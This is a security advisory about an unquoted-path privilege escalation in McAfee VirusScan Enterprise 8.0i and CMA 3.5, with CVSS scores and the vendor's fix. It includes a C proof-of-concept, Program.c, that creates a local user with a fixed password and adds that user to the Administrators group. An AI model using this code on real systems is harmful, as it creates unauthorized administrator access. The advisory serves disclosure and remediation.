Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)

Credit: Reed Arvin
Risk: Medium
Local: Yes
Remote: No

CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

( Original article: ) Summary: Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5) ( Details: By default the naPrdMgr.exe process runs under the context of the Local System account. Every so often it will run through a process where it does the following: - Attempts to run Program FilesNetwork AssociatesVirusScanEntVUtil.EXE - Reads C:Program FilesCommon FilesNetwork AssociatesEngineSCAN.DAT - Reads C:Program FilesCommon FilesNetwork AssociatesEngineNAMES.DAT - Reads C:Program FilesCommon FilesNetwork AssociatesEngineCLEAN.DAT The issue occurs when the naPrdMgr.exe process attempts to run the C:Program FilesNetwork AssociatesVirusScanEntVUtil.EXE file. Because of a lack of quotes the naPrdMgr.exe process first tries to run C:Program.exe. If that is not found it tries to run C:Program FilesNetwork.exe. When that is not found it finally runs the EntVUtil.EXE file that it was originally intending to run. A malicious user can create an application named Program.exe and place it on the root of the C: and it will be run with Local System privileges by the naPrdMgr.exe process. Source code for an example Program.exe is listed below. Vulnerable Versions: McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5) Patches/Workarounds: The vendor has released knowledge base article kb45256 to address the issue. Solution one from the vendor: "This issue is resolved in Patch 12." Solution two from the vendor: "The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to resolve the potential exploit. The new plugin is available as a HotFix from McAfee Tier III Technical Support." Exploits: // ===== Start Program.c ====== #include <windows.h> #include <stdio.h> INT main( VOID ) { CHAR szWinDir[ _MAX_PATH ]; CHAR szCmdLine[ _MAX_PATH ]; GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH ); printf( "Creating user "Program" with password "Pr0gr@m$$"...n" ); wsprintf( szCmdLine, "%s\system32\net.exe user Program Pr0gr@m$$ /add", szWinDir ); system( szCmdLine ); printf( "Adding user "Program" to the local Administrators group...n" ); wsprintf( szCmdLine, "%s\system32\net.exe localgroup Administrators Program /add", szWinDir ); system( szCmdLine ); return 0; } // ===== End Program.c ====== Discovered by Reed Arvin reedarvin[at]gmail[dot]com ( )

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top